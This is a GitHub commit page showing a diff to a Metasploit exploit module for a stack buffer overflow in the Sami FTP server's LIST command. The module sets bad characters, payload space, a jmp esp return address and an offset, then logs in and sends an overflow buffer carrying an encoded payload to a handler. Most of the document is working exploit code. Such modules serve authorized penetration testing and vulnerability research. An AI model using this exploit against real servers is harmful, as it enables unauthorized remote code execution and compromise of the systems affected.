Skip to content

Commit e9af05a

Browse files
committed
made recommended changes
1 parent 4bb64a0 commit e9af05a

File tree

1 file changed

+8
-16
lines changed

1 file changed

+8
-16
lines changed

modules/exploits/windows/ftp/sami_ftpd_list.rb

Lines changed: 8 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88
require 'msf/core'
99

1010
class Metasploit4 < Msf::Exploit::Remote
11-
Rank = AverageRanking
11+
Rank = NormalRanking
1212

1313
include Msf::Exploit::Remote::Ftp
1414

@@ -31,43 +31,35 @@ def initialize(info = {})
3131
[ 'OSVDB', '90815'],
3232
[ 'EDB', '24557'],
3333
],
34-
'DefaultOptions' =>
35-
{
36-
'EXITFUNC' => 'seh',
37-
'target' => 0
38-
},
3934
'Privileged' => false,
4035
'Payload' =>
4136
{
42-
'Space' => 900,
43-
'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
37+
'Space' => 955,
38+
'BadChars' => "\x00\x0a\x0d\x20\xff",
4439
'StackAdjustment' => -3500,
4540
},
4641
'Targets' =>
4742
[
4843
[
49-
'Windows XP English SP3',
44+
'Windows Universal',
5045
{
5146
'Platform' => 'win',
52-
'Ret' => 0x10028283,
47+
'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
5348
'Offset' => 219,
5449
},
5550
],
5651
],
52+
'DefaultTarget' => 0,
5753
'DisclosureDate' => 'Feb 27 2013'))
5854
end
5955

6056
def exploit
61-
connect
62-
63-
print_status("Trying target #{target.name}...")
57+
connect_login
6458

65-
buf = rand_text_english(target['Offset'], payload_badchars)
59+
buf = rand_text(target['Offset'], payload_badchars)
6660
buf << [ target['Ret'] ].pack('V')
6761
buf << payload.encoded
6862

69-
send_cmd( ['USER', datastore['FTPUSER']] , false )
70-
send_cmd( ['PASS', datastore['FTPPASS']], false )
7163
send_cmd( ['LIST', buf], false )
7264

7365
handler

0 commit comments

Comments
 (0)